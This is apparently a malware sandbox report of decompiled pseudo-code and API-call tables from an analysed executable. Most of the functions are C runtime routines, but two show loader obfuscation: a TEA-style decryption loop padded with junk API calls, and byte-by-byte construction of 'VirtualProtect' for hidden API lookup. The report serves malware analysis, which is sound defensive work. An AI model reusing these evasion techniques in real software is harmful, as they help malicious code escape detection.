                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040FE60,0000000C,004063CB,00000000,00000000,?,004075F1,?), ref: 004062A2
                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 004062AD
                                                              • Part of subcall function 00403B20: Sleep.KERNEL32(000003E8,00000000,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B2C
                                                              • Part of subcall function 00403B20: GetModuleHandleW.KERNEL32(?,?,004061F3,KERNEL32.DLL,?,0040623F,?,004075F1,?), ref: 00403B35
                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
                                                            • GetProcAddress.KERNEL32(?,DecodePointer), ref: 004062E6
                                                            • __lock.LIBCMT ref: 00406308
                                                            • InterlockedIncrement.KERNEL32(004118A8), ref: 00406315
                                                            • __lock.LIBCMT ref: 00406329
                                                            • ___addlocaleref.LIBCMT ref: 00406347
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                            • API String ID: 1028249917-2843748187
                                                            • Opcode ID: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
                                                            • Instruction ID: c5f7f4d4a171d92e4fd546218ba084379517a2aa08b604ccda2bde3c11c0c46e
                                                            • Opcode Fuzzy Hash: 7daa365c4f1f3c6f5620963537f9db8d2fb6a0a2d92353cab0785856933f005d
                                                            • Instruction Fuzzy Hash: 4A1160719047059AD720AF7AD845B4ABBE4EF04314F10857FE99AB36E1CB789A40CB5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 307 4026cf-402713 call 4026c5 310 40271a-40273b 307->310 311 402747-40274c 310->311 312 40273d 310->312 313 40274e-402759 InterlockedExchange 311->313 314 40275f-402799 call 4026cc 311->314 312->311 313->314 317 4027a1-4027b1 314->317 318 40279b GetTickCount 314->318 319 4027c3-402822 317->319 320 4027b3-4027bd OpenFileMappingW DeleteVolumeMountPointA 317->320 318->317 319->310 321 402828-402833 319->321 320->319
                                                            C-Code - Quality: 79%
                                                            			E004026CF(unsigned int* __edi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				unsigned int _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				long _v56;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t70;
                                                            				intOrPtr _t71;
                                                            				intOrPtr _t75;
                                                            				unsigned int _t95;
                                                            				unsigned int* _t104;
                                                            				unsigned int _t105;
                                                            
                                                            				_t104 = __edi;
                                                            				_v16 =  *__edi;
                                                            				_t66 =  *0x412548; // 0x824f09e0
                                                            				_v48 = _t66;
                                                            				_t67 =  *0x41254c; // 0xd8c85a56
                                                            				_t105 = __edi[1];
                                                            				_v52 = _t67;
                                                            				_v32 = 0;
                                                            				E004026C5( &_v32);
                                                            				_t70 =  *0x412550; // 0x3a0d5c64
                                                            				_v32 = _v32 + 0x23f;
                                                            				_v40 = _t70;
                                                            				_t71 =  *0x412554; // 0x7f349909
                                                            				_v44 = _t71;
                                                            				_v36 = 0x20;
                                                            				do {
                                                            					_v24 = 2;
                                                            					_v24 = _v24 + 3;
                                                            					_v8 = (_v16 << 4) + _v40;
                                                            					_t75 =  *0x479904;
                                                            					if(_t75 == 0xfa9) {
                                                            						 *0x479764 = 0xedeb2e40;
                                                            					}
                                                            					if(_t75 == 0x3eb) {
                                                            						InterlockedExchange( &_v56, 0);
                                                            						 *0x4796c4 = 0;
                                                            					}
                                                            					_v20 = _v16;
                                                            					_v20 = _v20 + _v32;
                                                            					_v12 = _v16 >> 5;
                                                            					 *0x479760 = 0xf4ea3dee;
                                                            					E004026CC( &_v12, _v44);
                                                            					_v8 = _v8 ^ _v20;
                                                            					if( *0x479904 == 0x9e6) {
                                                            						GetTickCount();
                                                            					}
                                                            					_v12 = _v12 ^ _v8;
                                                            					if( *0x479904 == 0x213) {
                                                            						OpenFileMappingW(0, 0, 0);
                                                            						__imp__DeleteVolumeMountPointA(0);
                                                            					}
                                                            					_t105 = _t105 - _v12;
                                                            					_v28 = 2;
                                                            					_v28 = _v28 - 0x5396dd36;
                                                            					_v28 = _v28 + 0x5396dd38;
                                                            					_v8 = _t105 << _v28;
                                                            					_v8 = _v8 + _v48;
                                                            					_v20 = _v32 + _t105;
                                                            					_v12 = (_t105 >> _v24) + _v52;
                                                            					_v8 = _v8 ^ _v20;
                                                            					_v8 = _v8 ^ _v12;
                                                            					 *0x478664 = 0;
                                                            					_v16 = _v16 - _v8;
                                                            					_v32 = _v32 + 0x61c88647;
                                                            					_t61 =  &_v36;
                                                            					 *_t61 = _v36 - 1;
                                                            				} while ( *_t61 != 0);
                                                            				_t95 = _v16;
                                                            				_t104[1] = _t105;
                                                            				 *_t104 = _t95;
                                                            				return _t95;
                                                            			}
























                                                            0x004026cf
                                                            0x004026d7
                                                            0x004026da
                                                            0x004026df
                                                            0x004026e2
                                                            0x004026e9
                                                            0x004026ee
                                                            0x004026f4
                                                            0x004026f7
                                                            0x004026fc
                                                            0x00402701
                                                            0x00402708
                                                            0x0040270b
                                                            0x00402710
                                                            0x00402713
                                                            0x0040271a
                                                            0x0040271a
                                                            0x00402721
                                                            0x0040272e
                                                            0x00402731
                                                            0x0040273b
                                                            0x0040273d
                                                            0x0040273d
                                                            0x0040274c
                                                            0x00402753
                                                            0x00402759
                                                            0x00402759
                                                            0x00402762
                                                            0x00402768
                                                            0x00402771
                                                            0x0040277a
                                                            0x00402784
                                                            0x0040278c
                                                            0x00402799
                                                            0x0040279b
                                                            0x0040279b
                                                            0x004027a4
                                                            0x004027b1
                                                            0x004027b6
                                                            0x004027bd
                                                            0x004027bd
                                                            0x004027c3
                                                            0x004027c6
                                                            0x004027cd
                                                            0x004027d4
                                                            0x004027e2
                                                            0x004027e8
                                                            0x004027f3
                                                            0x004027fd
                                                            0x00402803
                                                            0x00402809
                                                            0x0040280c
                                                            0x00402815
                                                            0x00402818
                                                            0x0040281f
                                                            0x0040281f
                                                            0x0040281f
                                                            0x00402828
                                                            0x0040282b
                                                            0x0040282f
                                                            0x00402833

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00402753
                                                            • GetTickCount.KERNEL32 ref: 0040279B
                                                            • OpenFileMappingW.KERNEL32(00000000,00000000,00000000), ref: 004027B6
                                                            • DeleteVolumeMountPointA.KERNEL32 ref: 004027BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: CountDeleteExchangeFileInterlockedMappingMountOpenPointTickVolume
                                                            • String ID:
                                                            • API String ID: 4198633837-3916222277
                                                            • Opcode ID: a3de9b9d2199c9496f721bdb8be8d5d2553ec54f29bfe42e6fd289c16606e40d
                                                            • Instruction ID: 959d9536cc2af01ebd0cb0a7c350fa0603deb3360d6281285ca61861da0f28bc
                                                            • Opcode Fuzzy Hash: a3de9b9d2199c9496f721bdb8be8d5d2553ec54f29bfe42e6fd289c16606e40d
                                                            • Instruction Fuzzy Hash: 92419FB5D01219EFDB40DFA8DA89A9EBBF4FB18314F10846AE415F3250D374AA45CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E00408724(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _t15;
                                                            				LONG* _t21;
                                                            				long _t23;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				LONG* _t33;
                                                            				void* _t34;
                                                            				void* _t35;
                                                            
                                                            				_t35 = __eflags;
                                                            				_t29 = __edx;
                                                            				_t25 = __ebx;
                                                            				_push(0xc);
                                                            				_push(0x40ffd8);
                                                            				E0040487C(__ebx, __edi, __esi);
                                                            				_t31 = E004063F0(__ebx, _t35);
                                                            				_t15 =  *0x411dcc; // 0xfffffffe
                                                            				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                            					E00406842(_t25, _t29, _t31, 0xd);
                                                            					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                            					_t33 =  *(_t31 + 0x68);
                                                            					 *(_t34 - 0x1c) = _t33;
                                                            					__eflags = _t33 -  *0x411cd0; // 0x751860
                                                            					if(__eflags != 0) {
                                                            						__eflags = _t33;
                                                            						if(_t33 != 0) {
                                                            							_t23 = InterlockedDecrement(_t33);
                                                            							__eflags = _t23;
                                                            							if(_t23 == 0) {
                                                            								__eflags = _t33 - 0x4118a8;
                                                            								if(__eflags != 0) {
                                                            									_push(_t33);
                                                            									E004081A8(_t25, _t29, _t31, _t33, __eflags);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t21 =  *0x411cd0; // 0x751860
                                                            						 *(_t31 + 0x68) = _t21;
                                                            						_t33 =  *0x411cd0; // 0x751860
                                                            						 *(_t34 - 0x1c) = _t33;
                                                            						InterlockedIncrement(_t33);
                                                            					}
                                                            					 *(_t34 - 4) = 0xfffffffe;
                                                            					E004087BF();
                                                            				} else {
                                                            					_t33 =  *(_t31 + 0x68);
                                                            				}
                                                            				if(_t33 == 0) {
                                                            					E00403B50(0x20);
                                                            				}
                                                            				return E004048C1(_t33);
                                                            			}











                                                            0x00408724
                                                            0x00408724
                                                            0x00408724
                                                            0x00408724
                                                            0x00408726
                                                            0x0040872b
                                                            0x00408735
                                                            0x00408737
                                                            0x0040873f
                                                            0x00408760
                                                            0x00408766
                                                            0x0040876a
                                                            0x0040876d
                                                            0x00408770
                                                            0x00408776
                                                            0x00408778
                                                            0x0040877a
                                                            0x0040877d
                                                            0x00408783
                                                            0x00408785
                                                            0x00408787
                                                            0x0040878d
                                                            0x0040878f
                                                            0x00408790
                                                            0x00408795
                                                            0x0040878d
                                                            0x00408785
                                                            0x00408796
                                                            0x0040879b
                                                            0x0040879e
                                                            0x004087a4
                                                            0x004087a8
                                                            0x004087a8
                                                            0x004087ae
                                                            0x004087b5
                                                            0x00408747
                                                            0x00408747
                                                            0x00408747
                                                            0x0040874c
                                                            0x00408750
                                                            0x00408755
                                                            0x0040875d

                                                            APIs
                                                            • __getptd.LIBCMT ref: 00408730
                                                              • Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
                                                              • Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400
                                                            • __amsg_exit.LIBCMT ref: 00408750
                                                            • __lock.LIBCMT ref: 00408760
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040877D
                                                            • InterlockedIncrement.KERNEL32(00751860), ref: 004087A8
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 4271482742-0
                                                            • Opcode ID: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
                                                            • Instruction ID: 3afbc463ed8f73c63c96e670660ec91d28aa376d58571e4cd45f615bcc75b0f2
                                                            • Opcode Fuzzy Hash: 71ae38c397efa0934501c7a6d8e97c1f7f49a7ad680cb9b166df224390bfadfa
                                                            • Instruction Fuzzy Hash: A2018B329406119BCB20BB2A9E4578A7360BB00794F20813FE984776E5CF3CA941CBDD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E004081A8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				intOrPtr* _t10;
                                                            				intOrPtr _t13;
                                                            				intOrPtr _t24;
                                                            				void* _t26;
                                                            
                                                            				_push(0xc);
                                                            				_push(0x40ff70);
                                                            				_t8 = E0040487C(__ebx, __edi, __esi);
                                                            				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                            				if(_t24 == 0) {
                                                            					L9:
                                                            					return E004048C1(_t8);
                                                            				}
                                                            				if( *0x479930 != 3) {
                                                            					_push(_t24);
                                                            					L7:
                                                            					if(HeapFree( *0x4781d4, 0, ??) == 0) {
                                                            						_t10 = E00404382();
                                                            						 *_t10 = E00404340(GetLastError());
                                                            					}
                                                            					goto L9;
                                                            				}
                                                            				E00406842(__ebx, __edx, __edi, 4);
                                                            				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                            				_t13 = E00407605(_t24);
                                                            				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                            				if(_t13 != 0) {
                                                            					_push(_t24);
                                                            					_push(_t13);
                                                            					E00407635();
                                                            				}
                                                            				 *(_t26 - 4) = 0xfffffffe;
                                                            				_t8 = E004081FE();
                                                            				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                            					goto L9;
                                                            				} else {
                                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                                            					goto L7;
                                                            				}
                                                            			}







                                                            0x004081a8
                                                            0x004081aa
                                                            0x004081af
                                                            0x004081b4
                                                            0x004081b9
                                                            0x00408230
                                                            0x00408235
                                                            0x00408235
                                                            0x004081c2
                                                            0x00408207
                                                            0x00408208
                                                            0x00408218
                                                            0x0040821a
                                                            0x0040822d
                                                            0x0040822f
                                                            0x00000000
                                                            0x00408218
                                                            0x004081c6
                                                            0x004081cc
                                                            0x004081d1
                                                            0x004081d7
                                                            0x004081dc
                                                            0x004081de
                                                            0x004081df
                                                            0x004081e0
                                                            0x004081e6
                                                            0x004081e7
                                                            0x004081ee
                                                            0x004081f7
                                                            0x00000000
                                                            0x004081f9
                                                            0x004081f9
                                                            0x00000000
                                                            0x004081f9

                                                            APIs
                                                            • __lock.LIBCMT ref: 004081C6
                                                              • Part of subcall function 00406842: __mtinitlocknum.LIBCMT ref: 00406858
                                                              • Part of subcall function 00406842: __amsg_exit.LIBCMT ref: 00406864
                                                              • Part of subcall function 00406842: EnterCriticalSection.KERNEL32(?,?,?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001), ref: 0040686C
                                                            • ___sbh_find_block.LIBCMT ref: 004081D1
                                                            • ___sbh_free_block.LIBCMT ref: 004081E0
                                                            • HeapFree.KERNEL32(00000000,?,0040FF70,0000000C,00406823,00000000,0040FEB0,0000000C,0040685D,?,?,?,0040444C,00000004,0040FE20,0000000C), ref: 00408210
                                                            • GetLastError.KERNEL32(?,0040444C,00000004,0040FE20,0000000C,00408124,?,?,00000000,00000000,00000000,?,004063A2,00000001,00000214), ref: 00408221
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2714421763-0
                                                            • Opcode ID: db03fb04e2f12cb5f9b8e4092e04a331ef1d498928472dc22a03220a7c16e63a
                                                            • Instruction ID: ab5e074dddd761f2974dda4b056a856c15a9ed6b9620148ccf24a2c8c0a558f6
                                                            • Opcode Fuzzy Hash: db03fb04e2f12cb5f9b8e4092e04a331ef1d498928472dc22a03220a7c16e63a
                                                            • Instruction Fuzzy Hash: E101D671905B01AAEB207BB29D0AB5F3B64AF00368F10457FF5857A1D2CF3C99418AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E00409E57() {
                                                            				signed long long _v12;
                                                            				signed int _v20;
                                                            				signed long long _v28;
                                                            				signed char _t8;
                                                            
                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                            				if(_t8 == 0) {
                                                            					L6:
                                                            					_v20 =  *0x4019f8;
                                                            					_v28 =  *0x4019f0;
                                                            					asm("fsubr qword [ebp-0x18]");
                                                            					_v12 = _v28 / _v20 * _v20;
                                                            					asm("fld1");
                                                            					asm("fcomp qword [ebp-0x8]");
                                                            					asm("fnstsw ax");
                                                            					if((_t8 & 0x00000005) != 0) {
                                                            						return 0;
                                                            					} else {
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                            					if(__eax == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_push(0);
                                                            						return __eax;
                                                            					}
                                                            				}
                                                            			}







                                                            0x00409e5c
                                                            0x00409e64
                                                            0x00409e7b
                                                            0x00409e27
                                                            0x00409e30
                                                            0x00409e3c
                                                            0x00409e3f
                                                            0x00409e42
                                                            0x00409e44
                                                            0x00409e47
                                                            0x00409e4c
                                                            0x00409e56
                                                            0x00409e4e
                                                            0x00409e52
                                                            0x00409e52
                                                            0x00409e66
                                                            0x00409e6c
                                                            0x00409e74
                                                            0x00000000
                                                            0x00409e76
                                                            0x00409e76
                                                            0x00409e7a
                                                            0x00409e7a
                                                            0x00409e74

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00404ADC), ref: 00409E5C
                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00409E6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                            • API String ID: 1646373207-3105848591
                                                            • Opcode ID: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
                                                            • Instruction ID: e51290182a2e1e9a96986d294ad1c7ef0f1965be230ab9cad6a7acab8c16fd01
                                                            • Opcode Fuzzy Hash: a592ca076a3aea64c9ee387a4fddd7a4033359cafd30385b84a4aba461cebe9d
                                                            • Instruction Fuzzy Hash: B2F0367064050EE2DF005BB1FD1976F7A74BB80785F5505B1E1D2B00D9DF348871D68A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E004028BE(void* __ecx) {
                                                            				intOrPtr _v8;
                                                            				char _v12;
                                                            				struct HINSTANCE__* _t6;
                                                            
                                                            				_t6 = LoadLibraryA("kernel32.dll");
                                                            				 *0x479758 = _t6;
                                                            				 *0x478630 = 0x56;
                                                            				 *0x478631 = 0x69;
                                                            				 *0x478632 = 0x72;
                                                            				 *0x478637 = 0x50;
                                                            				 *0x47863d = 0x74;
                                                            				 *0x47863e = 0;
                                                            				 *0x478633 = 0x74;
                                                            				 *0x478634 = 0x75;
                                                            				 *0x478635 = 0x61;
                                                            				 *0x478636 = 0x6c;
                                                            				 *0x478638 = 0x72;
                                                            				 *0x478639 = 0x6f;
                                                            				 *0x47863a = 0x74;
                                                            				 *0x47863b = 0x65;
                                                            				 *0x47863c = 0x63;
                                                            				 *0x4796c0 = GetProcAddress(_t6, 0x478630);
                                                            				_v8 = 0x20;
                                                            				_v8 = _v8 + 0x20;
                                                            				return  *0x4796c0( *0x4796c8,  *0x479904, _v8,  &_v12, __ecx, __ecx);
                                                            			}






                                                            0x004028c8
                                                            0x004028d4
                                                            0x004028d9
                                                            0x004028e0
                                                            0x004028e7
                                                            0x004028ee
                                                            0x004028f5
                                                            0x004028fc
                                                            0x00402903
                                                            0x0040290a
                                                            0x00402911
                                                            0x00402918
                                                            0x0040291f
                                                            0x00402926
                                                            0x0040292d
                                                            0x00402934
                                                            0x0040293b
                                                            0x00402948
                                                            0x0040294d
                                                            0x00402954
                                                            0x00402972

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004028C8
                                                            • GetProcAddress.KERNEL32(00000000,00478630), ref: 00402942
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_1E3.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: $kernel32.dll
                                                            • API String ID: 2574300362-2116778257
                                                            • Opcode ID: b8359e939c81283bebe729ada419a0bd2d521e6afcb6c88bea73e5e6cbb4ac59
                                                            • Instruction ID: d649e91e83eb23e24f7f2faa1ebd5f5be3be1502daba47ed32a1c3a808fca3a4
                                                            • Opcode Fuzzy Hash: b8359e939c81283bebe729ada419a0bd2d521e6afcb6c88bea73e5e6cbb4ac59
                                                            • Instruction Fuzzy Hash: B411EF744882C0FEE701DB68ED8C7453F956326789F0401BCD18C56AB2DBBA1599C73E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00408F9B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				char _v20;
                                                            				signed int _t54;
                                                            				intOrPtr _t56;
                                                            				int _t57;
                                                            				int _t58;
                                                            				signed short* _t59;
                                                            				short* _t60;
                                                            				int _t65;
                                                            				char* _t72;
                                                            
                                                            				_t72 = _a8;
                                                            				if(_t72 == 0 || _a12 == 0) {
                                                            					L5:
                                                            					return 0;
                                                            				} else {
                                                            					if( *_t72 != 0) {
                                                            						E00404698( &_v20, _a16);
                                                            						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                                            							if(E004090CC( *_t72 & 0x000000ff,  &_v20) == 0) {
                                                            								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                                            									L10:
                                                            									if(_v8 != 0) {
                                                            										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                            									}
                                                            									return 1;
                                                            								}
                                                            								L21:
                                                            								_t54 = E00404382();
                                                            								 *_t54 = 0x2a;
                                                            								if(_v8 != 0) {
                                                            									_t54 = _v12;
                                                            									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                                                            								}
                                                            								return _t54 | 0xffffffff;
                                                            							}
                                                            							_t56 = _v20;
                                                            							_t65 =  *(_t56 + 0xac);
                                                            							if(_t65 <= 1 || _a12 < _t65) {
                                                            								L17:
                                                            								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                                                            									goto L21;
                                                            								} else {
                                                            									goto L19;
                                                            								}
                                                            							} else {
                                                            								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                            								_t56 = _v20;
                                                            								if(_t58 != 0) {
                                                            									L19:
                                                            									_t57 =  *(_t56 + 0xac);
                                                            									if(_v8 == 0) {
                                                            										return _t57;
                                                            									}
                                                            									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                            									return _t57;
                                                            								}
                                                            								goto L17;
                                                            							}
                                                            						}
                                                            						_t59 = _a4;
                                                            						if(_t59 != 0) {
                                                            							 *_t59 =  *_t72 & 0x000000ff;
                                                            						}
                                                            						goto L10;
                                                            					} else {
                                                            						_t60 = _a4;
                                                            						if(_t60 != 0) {
                                                            							 *_t60 = 0;
                                                            						}
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            			}














                                                            0x00408fa5
                                                            0x00408fac
                                                            0x00408fc3
                                                            0x00000000
                                                            0x00408fb3
                                                            0x00408fb5
                                                            0x00408fcf
                                                            0x00408fda
                                                            0x0040900c
                                                            0x004090aa
                                                            0x00408fea
                                                            0x00408fed
                                                            0x00408ff2
                                                            0x00408ff2
                                                            0x00000000
                                                            0x00408ff8
                                                            0x0040906c
                                                            0x0040906c
                                                            0x00409071
                                                            0x0040907a
                                                            0x0040907c
                                                            0x0040907f
                                                            0x0040907f
                                                            0x00000000
                                                            0x00409083
                                                            0x0040900e
                                                            0x00409011
                                                            0x0040901a
                                                            0x00409041
                                                            0x0040904a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00409021
                                                            0x00409034
                                                            0x0040903c
                                                            0x0040903f
                                                            0x00409051
                                                            0x00409051
                                                            0x0040905a
                                                            0x00408fc8
                                                            0x00408fc8
                                                            0x00409063
                                                            0x00000000
                                                            0x00409063
                                                            0x00000000
                                                            0x0040903f
                                                            0x0040901a
                                                            0x00408fdc
                                                            0x00408fe1
                                                            0x00408fe7
                                                            0x00408fe7
                                                            0x00000000
                                                            0x00408fb7
                                                            0x00408fb7
                                                            0x00408fbc
                                                            0x00408fc0
                                                            0x00408fc0
                                                            0x00000000
                                                            0x00408fbc
                                                            0x00408fb5

                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408FCF
                                                            • __isleadbyte_l.LIBCMT ref: 00409003
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00409034
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 004090A2
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
